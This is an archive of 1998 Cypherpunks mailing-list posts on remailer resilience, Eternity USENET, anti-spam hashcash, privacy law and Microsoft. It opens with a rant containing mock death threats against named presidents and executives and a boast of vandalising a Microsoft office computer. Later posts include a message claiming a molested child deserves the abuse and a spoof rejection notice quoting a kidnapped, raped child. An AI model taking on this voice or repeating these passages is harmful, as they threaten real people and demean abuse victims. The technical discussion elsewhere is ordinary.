  OK, just kidding...
  Seriously, I am certain that there are millions of sheeple who slapped
their foreheads and proclaimed, "Who'da thunk it?", when they read such
recent news headlines as:
	"Nixon Knew!"
	"Joe Camel Designed To Lure Teens!"
	"Scientists Discover Earth is Round!"
  The point is, there are also a few chosen individuals (presumably
including yourself, but not necessarily Dan Quayle) who had already
figured these things out for themselves, long before the mainstream
media pronounced them as officially acceptable reality-bytes.
  Some of these selected individuals belong to agencies, organizations
and groups which overtly or covertly work within the established socio-
politico-economic structure to guide and direct the future of society,
government, civilization, and human development.
  And some of them work outside of, or within-yet independent of-the 
officially established structures...

  I am certain you are aware that there are certain individuals and 
organizations who have been actively preparing to take advantage of the 
increasingly popular boogeyman known as the 'Millennium Bug', while
keeping quiet about it so as not to alert others as to the true import
of the problem in regard to the radical nature of the changes which
will accompany it in the socio-politico-economic arenas of society.
  What you are undoubtedly unaware of, however, is that most of the
major players within the established power-structure are sucking 
hind-tit to a variety of techno-guerilla cells formed many years ago
to influence and/or counteract the activities of those who were making
plans to manipulate the situation to benefit the few and the powerful.
  The importance of these individuals is not in the particular nature
or scope of their activity, but in the fact that they are quite simply
volunteers who, unasked, have separated themself from the crowd around
them and committed themself to 'charging the hill' that they see needs
to be taken in order to provide safety and protection for their fellow
soldiers.

  One of these individuals is a soldier who was taken prisoner and
interred in a German prison camp in 1943.
  The fact of the matter is, he was a German national of French descent
who robed himself in the uniform of a fallen aviator in order to get
himself incarcerated for the purpose of helping Allied prisoners of
war to escape and successfully find their way to safety.
  The man was a shipping clerk who knew nothing of war, the military,
or the like, but who did what he felt must be done, despite his obvious
unsuitability and inexperience for the task. What I will never forget
is the puzzled look I saw on his face when someone tried to express
sympathy for the trials and tribulations he faced as a result of his
actions. His answer was to the effect that, "It was the price to be
paid for the decision I made...I knew that going in. It was the price
of freedom."

  The point I am trying to make is that the DOJ actions against M$
could probably be described by reference to a song I once wrote about
a cross-eyed girl, titled, "If Looks Could Kill, You'd Only Be Hurting
Yourself."
  The IRS, Treasury Department and the IMF are going to have all they
can handle just trying to tread water when the Millennium Bug throws
a good screw into their butts. BadBillyG and the Micro$not Exploiter
Bowling Team are going to take home their share of the New Millenium
trophies, but Blanc Weber and Jeff Sandquist are crazy-gluing enough
of the pins to the floor to make sure that the employees of Nut$crape
and $un can still put shoes on their childrens' feet.
(I've got to admit that your spin doctors are doing a damn fine job
 of building public sympathy for corporate executives who earn more
 in a year than Jane and Joe Public will earn in a lifetime.)

  In closing, I would like to assure the members of the various 
government and private agencies involved in investigating me as a
result of my thinly veiled virtual-death-threats against sundry world
leaders and titans of industry that their efforts are not a waste of
time.
  I honestly consider myself a viable prospect as a corporate/political
assassin--it's just that circumstances invariably arise which preclude
my acting on what I instinctively know to be the right course of action.
  In essence...I'm only human.

  From the corporate perspective, I knew years ago that IBM executives
deserved to die a slow and horrible death, but I could never quite
bring myself to overcome my resistance to destroying some truly great
suits in the process.
  I have had BadBillyG in my gunsights and headlights several times
over the years, but I would always back off when overcome by the urge
to tickle him under the chin, and call him  "little feller."

  As far as politics goes...
  I couldn't whack Nixon because he was so patently evil that his 
ultimate destiny is to be reincarnated as himself, and nothing I could
do to him could compare to that.
  Gerald Ford wasn't worth the trouble, since it seemed likely that he
would kill himself by bumping his head on some inanimate object, anyway.
  Jimmy Carter never really existed, politically, as far as I was
concerned. One of us slept through his administration, and I think it
was him...
  Reagan...after his statement that "Trees cause more pollution than
automobiles.", it would have been like whacking out a retarded kid. 
It was no accident that a movie actor was the target of an assassination 
by someone who watched one too many movies. I washed my hands of 
his involvement in the American political structure by writing 
a song called, "Don't Blame Me, I Voted For The Monkey..."

  George Bush was a conspiracy theorist's dream. He had so much shit
on his stick that the wise move was to leave him alone until his
tenure was in the history books, and then lay out a documented trail
leading from the financial source of his backing originating in profits
from Nazi business dealings during World War II --> to his bald-faced
audacity in trumpeting the rejuvenation of the Third Reich's 'New World
Order.' (But, when Bush was President, "...the trains ran on time.")

  Then, we have 'Slick Willie'.
  Apologies in advance, but you have pretty much been nailed as a
dope-smoking, draft-dodging, drug-dealing adulterer who has a history
of questionable business dealings ranging from real-estate fraud to
selling post-mortem military honors to people who died fucking their
brains out in the Lincoln bedroom in return for illegal campaign
contributions.
  My gut instinct tells me that there have probably been dozens of
potential assassins who have had you lined up in their gunsights, only
to see your silly grin and realize that you are not a whole lot 
different from themselves.

  "To him who does what within him lies, God will not deny his grace."
	~Saint Thomas Acquinas

  Nixon was a ratfucker, plain and simple. He didn't really *need* to do
the things that he did--he did them because he was willing to sell his
soul in order stretch every mile gained by legitimate effort an extra
inch or two by taking the dark path.
  The fact of the matter is, the Presidency requires an individual who
is capable of being a two-faced, double-dealing ratfucker when the
situation requires it, but Republicans seem to do it for the money,
while Democrats generally seem to be more attuned to the emotional
ramifications of the illusory power of the position.
  i.e. - a Rolling Stone music critic once stated that the power in
the music played by Southern Bad-Boy Rockers came from the fact that
they genuinely believed that they were going to burn in Hell for
playing Rock & Roll, but they knew that doing so was in their blood
and their destiny.

  Do you ever find yourself blowing out bad-ass pelvic-motion darkie-
licks on the saxaphone, and wondering how in the hell you managed to
have this much fun and still scam your way into being elected as one
of the most powerful political figures in the allegedly free world?
  Do you ever wonder why lunatics such as myself give you so much
shit over promoting Nazi cunts like Reno and FineSwine, when Hillary
did some genuinely fine work in regard to health care and still got
broad-sided by statists (both male and female) who thought that there
was something inherently sinful in her not suggesting that her ideas
could be made financially feasible by holding a bake sale?
(I voted for Geraldine Ferraro, but only because I figured that we
 wouldn't have to pay her as much as a man.)

  BTW, I just received a letter from Chelsea, and she thanked me
for my compliments on her butt, but told me she didn't think it was
proper to date a psychopath who was stalking her father with a
Stihl chainsaw. (So there is little need for you to lose a lot of
sleep over the prospect of having to invite me for Thanksgiving
dinner, and call me "son.")
  I also sent a letter a few weeks ago to Ted Kaczynski, offering to
carry on his work while he is incarcerated. I got a letter back from
him today, but I'm afraid to open it...

  Anyway, I realize that I'm starting to babble incoherently, and need
to go take my medication, so I'll close by giving you a few words of
wisdom, in case there's a chance that you're banging the White House
staff person hired to screen your email.

Re: Allowing the DOJ to perform a rim-job on BillyG...
  BadBillyG has the brains to realize that he only has to hang on
for another 12 months, or so, before the Wonderful World of Computers
is up to their ass in alligators over the Year2000 bug.
  If you truly believe that an individual who became the richest person
in the world by promoting a fairly mediocre operating system is going
to bend over and lift his robe while the dipshits who were incapable of
competing with him (even when they had software and operating systems
vastly superior to his) scramble to make their Y2K-non-compliant
software comatible with their bum-buddy's Y2K-non-compliant software...
  I have some ocean-front property in Tucson, Arizona.

Re: The poor, put-upon souls competing with Micro$not...
  It has been confirmed by extensive research that the future can be
reliably predicted by taking note of the actions and reactions of the
lunatic and criminal elements of society.
  I happen to qualify on both counts...
  I enjoy the living shit out of Micro$not Ba$hing, but it pisses me 
off when the government does it...
  I will kiss your lily-white ass if you can prove to me that the  
goddamn whiners bitching about BillyG's profits are not pulling down
millions of dollars a year themselves. BillyG has a hundred billion
dollars? I don't care if he has a fucking trillion dollars...those
other whining fucks DO NOT have a God-given right to get filthy rich
by keeping the price of their products inflated through the stifling
of competition from Micro$not.
  What, exactly, is Nut$crape'$ complaint? That if Micro$not gives away
InteNet Exploiter for free, that they cannot force me to pay to acquire
a product that is designed to deliver commercial advertising to my 
screen when I surf the Net? Fuck those assholes...
  What, exactly, is $un Micro$ystem'$ complaint? That they have to 
produce products that don't cost ten times what Micro$not's products
cost, in order to capture a decent market-share? Fuck those assholes...

FRESH FROM THE CLUESERVER!!!
  I'm a fucking lunatic. I've had enough electricity run through my
brain to keep Las Vegas in business for a decade. I require intense
medication to keep from chewing on the rug and barking at the moon.
  Nonetheless, I was promoting and addressing computer issues in
the 80's that are being recognized as essential to the future of
technology at the close of the 90's. And what you should find *really
scary* is that there are sane, functional people out and about in
your world who not only know all that I do, and more, but who are
in a position to throw a serious fuck into the heart of any technology
system that the powermongers are counting on to promote their narrow
self-interests over those of the general public.

  On a recent trip between B.C. and California,  I stopped off in 
Micro$not Land long enough to vandalize the computer system in one
of their offices so that their faxes to certain locations would
translate the words "Bill Gates" into "Little Feller."
  Mission Impossible-->Mission Complete.

  Let me explain this as simply as possible.
  When the clock strikes 2000, many corporate and government agencies
can kiss thier software functionality goodbye. Many of the companies
who believe they are in a position to take advantage of the situation
will find that small anomalies exist in their systems which will take
tens of thousands of man-hours to resolve (only to discover that the
'solution' leads to another anomaly of the same nature).
  Keep in mind that what I am describing is only a small part of a
process that began in 1989, with a computer manifesto which contained
the words,
	"His Login is Panic,
	 His Password is Crash.
	 When Time is of Essence,
	 He'll Rise from the Ash."
  These words were written by a computer neophyte who recognized the
path the future would take, but who had no idea what could be done
to counteract the evil he foresaw. Others *did* know what could be
done...and more...

  The Y2K problem is quickly gaining recognition as a factor that
will lead to monumental changes in the process of separating the
winners from the losers in the coming Millennium.
  What is recognized by only a select few is that there are other
considerations which have been programmed to go hand-in-hand with
the Y2K problem which will have even greater influence on who
will emerge in the next Millennium as the chief movers and shakers
of society, government and civilization.

  In 1989, the Author wrote, "Gomez is coming."
  In 1998, the Author arrived for gomez's funeral the day before he
was assassinated. The timing of his arrival was dependent upon the
information he received from Netizens he didn't know, and had never
met. Netizens who had ears to hear, and had acted on his warnings
in ways which went far beyond the ken of his own understanding of
the prophecies which he spoke.
  The Author neither knew nor cared about the source or intentions
of those who had directed him to travel to Berkeley in time to
say a last goodbye to his friend and mentor.
  Neither did he know or care how or why he instinctively knew that
upon opening the letter he received from the alleged UnaBomber, that
his brains would be splattered upon the wall behind him, forming the
words, "TRIN--The Revolution Is NOW!"

I'm Going To Count To Ten...
~~~~~~~~~~~
TruthMonger
~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 16 Jan 1998 11:37:45 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Number Theory on Computers book...
Message-ID: <199801160402.WAA08670@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

If you're looking for a good beginners book for number theory that is
focused on using computer programs (BASIC) then check out:

Exploring Number Theory w/ Microcomputers
Donald D. Spencer
ISBN 0-89218-113-3 (note I couldn't find w/ this, had to use the title)
$24.95

Camelot Publishing
PO Box 1357
Ormond Beach, FL  32175
904-672-5672

I ordered mine through Bookstop and should take 4-8 weeks for delivery.
There is a teachers manual available as well (I suspect it is answers only)
for $15.95


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Fri, 16 Jan 1998 15:07:49 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Microsoft Metaphors
In-Reply-To: <v03007808b0e3d6ab4a0f@[204.254.22.155]>
Message-ID: <3.0.5.32.19980115230112.0087a340@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



The new upcoming version of Windows gives the user the choice of using
Internet Explorer as the main interface for access to the desktop icons,
the computer files, internet services like AOL, or web pages.   It is still
the user's choice to use Win95 as they are accustomed to - they must
manually select this option in order to use it - but it is a new way of
using Internet Explorer, for more than just viewing web pages.

You could say it is becoming the window from which to view the rest of the
rooms in the house, including what's beyond, outside of it.
    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 16 Jan 1998 16:51:52 +0800
To: Privacy Admin <woz@privacynb.ml.org>
Subject: Re: Forwarding remailer-ops posts
In-Reply-To: <Pine.LNX.3.95.980115164818.244A-100000@privacynb.ml.org>
Message-ID: <34BF065B.3F43@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain



Privacy Admin wrote:
> 
> On Thu, 15 Jan 1998, Mark Berry wrote:
> 
> > Just a quick question... Does anyone object to their posts to this list
> > being forwarded (to cypherpunk type lists)?  I will honour any requests not
> 
> I object since it would likely increaes the volume of the mailing list,
> which was designed to be low-volume (IMHO) so that all remailer operators
> would bother to read it. Those operators who do not already read
> cypherpunks may not welcome the increase of flaming, wildly tagentantal
> material and plenty of petty bickering.

  Only an asshole without the brainpower to recognize the importance of
open discussions of Tanya Harding's chances of forging a new career in
the WorldWide Wrestling Federation would also fail to recognize that
differences of opinion over the size of jockey shorts that Chris Lewis
should be required to wear is essential to the future of the IntereNet.
 
  Privacy Admin (if that is your *real* name...) would be well advised
to consider the astronomical rise in cost of InterNet access that could
result from AOL'ers learning to successfully unsubscribe from mailing
lists, instead of subsidizing the rest of us by paying exhorbitant
fees to send multiple messages saying, "I'm SERIOUS! Unscribvive me 
from this fucking mailing list or I will keep complaining, instead of
buying a clue!"

  If the foregoing doesn't seem to make sense, it's OK, because I
am a list scibviver. (Although I have been unsuccessfully trying
to ubscrivive for the last several months.)

Tojohoto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Fri, 16 Jan 1998 16:48:41 +0800
To: Richard Johnson <rdump@river.com>
Subject: Re: Forwarding remailer-ops posts
In-Reply-To: <v0313030cb0e43e523af9@rogue.river.com>
Message-ID: <34BF11B2.4206@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain



Richard Johnson wrote:
> 
> At 12:33 -0700 on 1/15/98, Mark Berry wrote:
> > Hi to all members of the list
> >
> > Just a quick question... Does anyone object to their posts to this list
> > being forwarded (to cypherpunk type lists)? ...

> I don't really care about my own posts, should I make some.  I worry,
> however, about drawing in the kooks. 

> Richard

  My name isn't Richard, but I'm still a Dick...

  I agree that we should worry about drawing in the kooks who have
little experience in proper construction of an aluminum-foil hat
capable of drowning out the voices that try to twist our minds 
into believing that the purpose of operating a remailer is to
provide a forum for unfettered communication, when Rush Limbaugh
and Chris Lewis recognize that the true purpose of running a
remailer is to block spam and UCE's.

  Even more frightening is the prospect that a US citizen might
go so far as to use a remailer to send a message to the Whitehouse
that men licensed to use guns against the citizens might find
objectionable.
  Those who have never operated a remailer fail to realize that
the main goal of a remailer-operator should not be to provide
a non-discriminatory forwarding service for anonymous users, but
to ensure continued operation by not ruffling the feathers of
upstream providers, and to provide a spam/UCE filtering service
for computer users who have foolishly spent their money 
purchasing email software which does not allow them to quickly
and easily set up their own self-defined email filters.

  It has long been my contention that if a child being molested
by 'Uncle Jim' is too fucking lazy to learn how to use PGP in
order to help remailer operators cut down on spam, then they
deserve every ounce of seminal fluid forced down their throat
by 'Uncle Jim' and the guys who live in the dumpster behind
the Greyhound station and are willing to share their bottle
of Thunderbird with anyone who has access to vulnerable young
children.

  Of course, I'm a pedophile, so I could be a bit biased in
this regard.

TotoHomoLoco






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 16 Jan 1998 10:04:58 +0800
To: ravage@ssz.com
Subject: Re: (eternity) Covert Superhighway - the missing component? (fwd)
In-Reply-To: <199801141553.JAA01099@einstein.ssz.com>
Message-ID: <199801160014.AAA00557@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:
> Adam Back <aba@dcs.ex.ac.uk>:
> > - post to random newsgroups, use textual mimic functions, send
> >   decryption keys after the stegoed data has been distributed to
> >   disguise data until it is too late to affect distribution
> 
> Isn't this going to increase latency and increase the likelihood of both
> sureptitious attacks (I notice the request in newsgroup A and begin putting
> my mitm requests in the other newsgroups - the odds being that I will get
> the data and then forward to the original recipient with small changes) as
> well as must plain missing the request?

It will increase latency yes.  It will also make the attackers job
harder.

If you are talking about posting requests it sounds like you are
describing Eternity BlackNet, eternity USENET basically acts like a
FAST-TEXT TELETEXT system -- keeps the most recent copy of pages as
they are updated, there is no request to post because the reader acts
entirely passively, and is harder to trace because he is passive. 

> > When people can buy a T1 to their house for 2,000/yr instead of
> > 20,000, we will stand a better chance.
> 
> SWBT will currently sell T1 access to homes for as little as $214/mo. Would
> you settle for $2,568/yr.? Note that this price doesn't include routing and
> name resolution. I'm still (3 months later) trying to get SWBT to tell me
> how much they will charge for this - they supposedly offer it but I have yet
> to find an actual business office that support home delivery of service.

I don't know who SWBT are, but I suspect they don't offer service in
the UK.  If they did at that price I would have them install the T1
tomorrow.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Fri, 16 Jan 1998 16:35:46 +0800
To: cypherpunks@cyberpass.net
Subject: RSA Conference: Deterence measures for SPAM
Message-ID: <v03102802b0e4c4e06860@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



Kevin McCurley, IBM, delivered a paper on using electronic commerce techniques (i.e., d-postage) to deter SPAM.  He cites a work by Cynthia Dwork and Moni Naor, "Pricing via Processing or Combatting Junk Mail,"  http://www.wisdom.weizmann.ac.il/Papers/trs/CS95-20/abstract.html  I wan't able to access that paper and would be interested to know how similar their appraoch is to HashCash.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 16 Jan 1998 13:32:30 +0800
To: cypherpunks@cyberpass.net
Subject: Indiana state court rejects privacy claim in HIV case
Message-ID: <v03007802b0e49dbe049b@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



So I just got done reading the decision in Doe v. Methodist Hospital, a
recent case before the Indiana Supreme Court. (Thanks to Eugene for
pointing it out.)

The case involved a woman who truthfully told someone else a third party
was HIV positive. She did not break any laws to learn this information;
someone else told her. The HIV-positive man's suit against her relied on
the so-called tort of disclosure of private facts. (There are four privacy
torts: intrusion upon seclusion; appropriation of likeness; public
disclosure of private facts; false-light publicity.) The plaintiff could
not charge her with libel or slander since what she said was true.

The judges referenced an oft-cited 1890 Warren-Brandeis article that
popularized the idea of suing reporters (and others) for violating your
privacy if they said truthful things about you. The authors seemed mainly
concerned with muzzling journalists and censoring the press, the court
noted:

        The invasion of privacy tort had its genesis in an 1890 law
	review article by Boston attorney Samuel Warren and his
	former law partner--and future Supreme Court
	Justice--Louis Brandeis. An impetus for it seems to have
	been the press's coverage of Warren's wife's social
	gatherings "in highly personal and embarrasing detail."
	The reports covering their daughter's wedding were
	apparently more than the Warrens' sensibilities could
	bear... The authors criticized the press for
	"overstepping in every direction the obvious bounds of
	propriety and decency." They were concerned that truthful
	reporting about "private" affairs was causing "a lowering
	of social standards and of morality."... A cause of
	action for invasion of privacy would chill the press from
	reporting "unseemly gossip."

The Indiana court ruled, in a plurality opinion (joined by a concurrence):

        [w]e do not discern anything special about disclosure
	injuries. Perhaps Victorian sensibilities once provided
	a sound basis of distinction, but our more open and
	tolerant society has largely outgrown such a
	justification. In our "been there, done that" age of talk
	shows, tabloids, and twelve-step programs, public
	disclosures of private facts are far less likely to cause
	shock, offense, or emotional distress than at the time
	Warren and Brandeis wrote their famous article.

The court flatly rejected and refused to recognize the tort of disclosure
of private facts. It upheld the lower court's decision to grant summary
judgment to the woman who was sued. In other words: you're allowed to speak
the truth. The court even noted that gossip is socially useful.

Score a minor victory for free speech and freedom of the press over
so-called "privacy" laws.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spam Prevention Remailer <spm@dev.null>
Date: Fri, 16 Jan 1998 16:48:23 +0800
To: cypherpunks@toad.com
Subject: Automated Rejection Notice
In-Reply-To: <v0313030cb0e43e523af9@rogue.river.com>
Message-ID: <34BF19F7.7BF6@dev.null>
MIME-Version: 1.0
Content-Type: text/plain



Dear Remailer User,
  This automated reply is for the purpose of informing you why your
message was rejected by our remailer filtering software.

Rejection Message #17:
Your remailer request was rejected because header analysis indicated
that it contained an unsolicited commercial message.

Rejected Email:
> From: delicateflower@basement.com
> To: Spam Prevention Remailer
> Subject: Make $$$ Fast !!!
> 
> Anon-To: child-abuse@hotline.com
>
>  Help!
>  I am a ten year old girl being forcibly confined against my will
> in a kidnapper's basement at 1040 E. Munroe, in Seattle, WA.
>  The sick pervert who kidnapped me is allowing his friends to rape
> me in return for large sums of money which he keeps in the basement
> room in which I am being held.
>  Anyone who takes pity on me and comes to my rescue can Make $$$ Fast
> by pocketing the great pile of cash that this sick pervert has
> accumulated by profiting from my suffering and abuse.
>
> Please help.
>
> Jon Polly Bonet-Klaus-Ramsey





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@ne-wendigo.jabberwock.org>
Date: Fri, 16 Jan 1998 13:50:05 +0800
To: tcmay@got.net (Tim May)
Subject: Re: Personal webpages can get you fired [CNN]
In-Reply-To: <v03102801b0e479088e30@[207.167.93.63]>
Message-ID: <199801160534.AAA25032@deathstar.jabberwock.org>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Tim May wrote:
: 
: And as with the AOL case of Timothy McVeigh (no, not _that_ one) being
: kicked out of the Navy for labelling himself as "gay" and as a "boy hunter"
: on one of his AOL profiles, there are already calls for new privacy laws.
: 
: Which misses the point. By illegalizing the keeping or disclosing of
: lawfully obtained information, greater harm is done.
: 
: I heard Nadine Strossen of the ACLU arguing today that more laws are needed
: to "prevent" these "abuses." In fact, more _technology_ is what's needed.
: The technology of Web proxies, remailers, nyms, and such.
: 

This issue was covered in _The Right to Privacy_ by Ellen Alderman and
Carolyn Kennedy.  The book was misplaced during my recent move, and I didn't
get very far through it.  I do remember that the current legal standard for
invasion of privacy depended upon whether the information was gathered from
a public medium.  A psychiatric evaluation or Telco records would not be
considered a public forum, so could not be used by an employer (unless the
evaluation was given by the employer, I guess).  A web page, on the other hand
is about as public as you can get.

I would agree that with the right technologies (proxies, remailers, etc) there
would be a de facto protection of privacy, and (insert the not-even-close-to-
a-lawyer disclaimer here) that there should be some legal basis that since
the effort was made to hide the True Name, the content could not be used, if
there were a compromise.  Looks like a win-win.

It still doesn't deal with morons who *provide* their employers with the 
ammo to terminate employment.  You can make a system foolproof, but you can't
make it damnfoolproof.

Mark

- -- 
[] Mark Rogaski                   "That which does not kill me
[] wendigo@pobox.com                 only makes me stranger."
[]
[]      finger wendigo@deathstar.jabberwock.org for PGP key
[] anti spambot: postmaster@localhost abuse@localhost uce@ftc.gov

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNL7xbXzbrFts6CmBAQG6YQgAhywAsGpbDIBY/5h/KSLG+C4BdpYuqIOD
Gg1Zy/05gB02+Ap2o7YOpx5pP92iG4uWnYNlUcq6tf+83atd5Y0fvHEnuS5GinQX
mdZ8HqZMNR/XaVH+J/BLWcWPjWWGYnI7Zms/3VFvE5tA+0KVX3lKBqpTiCRCOIZi
pqInONdqo1derBidHiM0KEcfZJ6zwecaS164NgmKI7/+akDSauK/ja44sKc+4bLI
Qfaamrm9pXPKNvc+WOMMNzjNpwzqemfpobDsB3morIcn/eJa/1sE3H2NwnMKvOLY
bNhXjfj9P5FNiMqJMHeKMX0vVJGPp3B72y0QEJwpaR5LHst792KF1w==
=WPJ3
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 16 Jan 1998 10:03:32 +0800
To: rdl@mit.edu
Subject: remailer resistancs to attack
In-Reply-To: <199801151705.MAA03621@the-great-machine.mit.edu>
Message-ID: <199801160125.BAA00650@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Ryan Lackey <rdl@mit.edu> writes:
> (Eternity-USENET is vulnerable to technical Denial of Service attacks
> with the current small number of indexing servers, even if it is protected
> from legal issues.  I think illegal or extralegal attacks are as dangerous
> as the legal ones)

Public access servers aren't a good idea.  Really people should be
running local access servers only.  The index is local, cache is
local, and USENET is a distributed broadcast medium.

Seems close to ideal to me, the problem being as Tim points out:
bandwidth limitations.  The bandwidth limitation is debilitating; to
overcome this we have to relax security, for example by using
remailers rather than USENET for all but indexes of documents.

One criticism I noticed several people raise was that USENET would be
shut down as a way to kill eternity USENET when something
controversial gets posted.

However it seems to me that the weakest point is the remailer network.
It seems likely that it would be much easier for governments to shut
down the remailer network than it would be to shut down USENET.  There
are only around 20 or so remailers, and they all have known IP
addresses, operators, localities, etc.  I expect the spooks could shut
them down with less than 1 days notice if they wanted to.

So, where would blacknet, and eternity USENET be after that?

How do we improve the resistance of the remailer network to well
resourced attackers intent on dismantling it?

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 16 Jan 1998 08:46:57 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Microsoft Metaphors
Message-ID: <199801160041.BAA12637@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



declan@well.com wrote:

 > What are the best metaphors to use when talking about a browser
 > and an operating system? Is the combination like a car and an
 > engine, or a car and a roofrack? A pair of gloves?

In this specific case it's more like garbage in a trash can.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 16 Jan 1998 10:04:14 +0800
To: tcmay@got.net
Subject: Re: mirroring services, web accounts for ecash
In-Reply-To: <v03102805b0e09252f52e@[207.167.93.63]>
Message-ID: <199801160153.BAA00672@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May <tcmay@got.net>
> Here's a meta-question: Suppose one holds highly secret or sensitive data,
> for which one wants to use an Eternity service to ensure the information is
> not suppressed by some government or other actor.
> 
> Why centralize the data at all?
> 
> Why not just use the "pointer" to the data and offer to provide it?
> 
> Which is what Blacknet was all about. Instead of focussing on a data base,
> focus instead on an untraceable market mechanism.

I am more and more seeing the similarities between BlackNet and
Eternity USENET.  The only real difference that I can see is that for
E-USENET I have been talking about periodically broadcasting the data
to allow very high security for the reader, and also the idea of
keeping a local copy of the documents so that data is pre-fetched to
speed up accesses.

Both designs are relying heavily on the anonymity provided by
remailers.  For very high risk traffic, even using mixmaster remailers
may be risky due to the various active attacks which could be mounted
by a well resourced attacker with ability to selectively deny service.

An eternity service or blacknet information provider could frustrate
the active attacker by having many software agents with different
network connectivity and using these resources unpredictably.

> (I admit that a system which can provide *A LOT* of data *VERY
> FAST*, and also untraceably or unstoppably, is an attractive goal.
> [...]  The catch is that I can't see how such a system will get
> built, who will run the nodes, how payment will be made to pay for
> the nodes and work, and how traffic analysis will be defeated.)

One big opportunity we have is to subvert protocols of new services.
A distributed web replacement with ecash payment for page hits I think
is plausible.  Web pages could migrate to meet demand.  You could have
a hot-potatoe effect, where high risk documents are not kept for long
-- bits move faster than government agents and lawyers -- hot data
could migrate every 10 minutes.  

However distributed web replacements are complex to design, and
whether it will be possible to deploy the system widely is an open
question.

> And I think implementing the slower-but-no-breakthroughs approach (Blacknet
> or variations) has some advantages. It may be many years before we need to
> be in the corner of the graph that is "large amounts of data--very fast
> retrieval--very secure."
>
> Most candidates for untraceable/secure storage and retrieval are NOT in
> this corner, yet. (Kiddie porn may be, but whistleblowing and scientific
> information are not.)

What about large scale software piracy.  This could consume serious
amounts of bandwidth.  This seems to be intermediate risk in that if
one observes even 30 seconds of traffic in #warez, one observes lots
of commercial software trading hands.

Perhaps the new draconian US software copyright law which the large
software corps purchased from the politicians will move software
piracy towards the higher risk end.

Would the world be better off without software copyright?  I tend to
think so.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mws@conch.net (NNS)
Date: Fri, 16 Jan 1998 07:35:40 +0800
To: cypherpunks@toad.com
Subject: Add me to the mailing list
Message-ID: <34c9c1ce.20262373@mail.conch.net>
MIME-Version: 1.0
Content-Type: text/plain



mws@conch.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Fri, 16 Jan 1998 18:05:37 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: remailer resistancs to attack
In-Reply-To: <199801151705.MAA03621@the-great-machine.mit.edu>
Message-ID: <3.0.3.32.19980116045037.031a4b40@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 01:25 AM 1/16/98 GMT, Adam Back wrote:
>How do we improve the resistance of the remailer network to well
>resourced attackers intent on dismantling it?

An obvious thing to try is to add some more remailers.  300 remailers would
not be immune to simultaneous shutdown by the authorities, but it would
make it more difficult.  A dozen of so remailers makes shutdown fairly simple.

A less obvious thing to try is to get the general windows users to start
making use of remailers.  If Eudora, Pegasus, and Outlook came nym ready
out of the box, with the ease of use of a spell checker, then this would
generate enough traffic to flood the remailer network and require hundreds
of servers.  This idea has it's own problems, but there is not much traffic
on remailers.  One of the busiest remailers in the world still has only
about 3,000 messages per day.  One spammer can send mail to more
destinations in a weekend than the entire remailer network in a year.

Threats to the remailer network come from a few basic places.

  1.  Traditional law enforcement
  2.  Unauthorized law enforcement
  3.  "friends" of message recipients or "friends" of the remailer
  4.  unreliability of the machines that form the network
  5.  Hacking attacks
  6.  Design
  7.  User incompetence

Of the above, the most dangerous in my opinion is "friends".  This is what
shut Balls down.  This is where Cracker gets the worst complaints.  Seldom
do I hear a complaint from a message recipient, more I hear from "I have a
friend who got this message..."  Traditional law enforcement is a quick
call with a thank you I'm dropping this.  While penet shut down after an
